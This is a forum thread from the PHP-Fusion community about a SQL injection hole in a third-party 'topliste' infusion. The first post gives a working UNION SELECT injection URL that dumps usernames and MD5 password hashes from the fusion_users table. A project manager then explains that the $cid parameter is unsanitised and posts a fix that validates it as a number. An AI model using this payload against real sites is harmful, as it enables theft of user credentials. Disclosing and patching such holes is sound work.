Topsite for Hacked url look that
Asked Modified Viewed 1,985 times
Murat
Murat 10
Türkiyenin En Büyük PHP-FUSION Forumlarına Hoş Geldiniz.
Php-Fusion Türkiye Forever Team!
Turkish Support www.phpfusion.gen.tr
Themes Support www.fusiontema.com
English Support www.phpfusion.us
Extreme-Fusion Turkish www.extreme-fusion.gen.tr
- Junior Member, joined since
- Contributed 16 posts on the community forums.
- Started 4 threads in the forums
- Started this discussions
http://www.sitename.com/infusions/topliste/index.php?cid=-1/**/UNION/**/SELECT/**/0,1,2,3,user_name,user_password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/FROM/**/fusion_users/*
thats working and show time md5 to users B)
thats working and show time md5 to users B)
Falk
Falk 148
Need help?, Having trouble?
• View our Documentation for Guides, Standards and Functions
• Name and Organize your Topics and Content correctly in the corresponding Forums for best support results
• Attaching Log Files and Screenshots when reporting issues will help
• Provide with an URL to live example if one exists
• Please read the How to Report an Error post
• Please read and comply with the Code of Conduct
• View our Documentation for Guides, Standards and Functions
• Name and Organize your Topics and Content correctly in the corresponding Forums for best support results
• Attaching Log Files and Screenshots when reporting issues will help
• Provide with an URL to live example if one exists
• Please read the How to Report an Error post
• Please read and comply with the Code of Conduct
(¯·._.·(¯°·._.·°º*[ Project Manager ]*º°·._.·°¯)·._.·¯)
- Super Admin, joined since
- Contributed 6,201 posts on the community forums.
- Started 639 threads in the forums
- Answered 12 questions
As its a 3rd party infusion its not our fault, in this case the coder has neglected to sanitise the $cid variable, thus leaving a very dangerous hole.
answered
how would you recommend this be fixed?
Simple:
Open index.php and search for:
And replace with:
Open index.php and search for:
Code Download source
if (!$cid) {$cid = 0;}And replace with:
Code Download source
if (!isset($cid) || !isNum($cid)) $cid = 0; moppentappers
- Junior Member, joined since
- Contributed 26 posts on the community forums.
- Started 4 threads in the forums
so only the admin password can be seen?
my admin access mod would prevent the hackers from entering the admin panel
or isn't that wat is happening?
my admin access mod would prevent the hackers from entering the admin panel
or isn't that wat is happening?
Category Forum
Bugs and Errors - 6Labels
None yet
Statistics
- Views 0 views
- Posts 4 posts
- Votes 0 votes
- Topic users 5 members
0 participants
Notifications
Track thread
You are not receiving notifications from this thread.
Related Questions